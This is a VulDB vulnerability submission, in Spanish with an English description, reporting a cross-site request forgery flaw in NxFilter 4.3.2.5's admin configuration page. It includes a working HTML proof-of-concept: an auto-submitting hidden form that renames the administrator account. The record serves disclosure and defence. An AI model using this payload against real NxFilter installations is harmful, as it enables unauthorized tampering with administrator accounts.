Enviar #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRFinformación

TítuloNxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF
DescripciónA CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want. Exploit in HTML: <!DOCTYPE html> <html lang="en"> <head> </head> <body> <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST"> <!-- Campos do formulário --> <input type="hidden" name="actionFlag" value="update"> <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here--> <!-- Botão para enviar o formulário --> <button type="submit">Enviar Requisição</button> </form> </body> <script> document.getElementById('configForm').submit(); </script> </html>
Fuente⚠️ https://APP.COM/config,admin.jsp
Usuario
 0xgordo (UID 50709)
Sumisión2023-12-08 17:26 (hace 3 años)
Moderación2023-12-17 09:25 (9 days later)
EstadoAceptado
Entrada de VulDB248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name falsificación de solicitudes en sitios cruzados]
Puntos17

Do you know our Splunk app?

Download it now for free!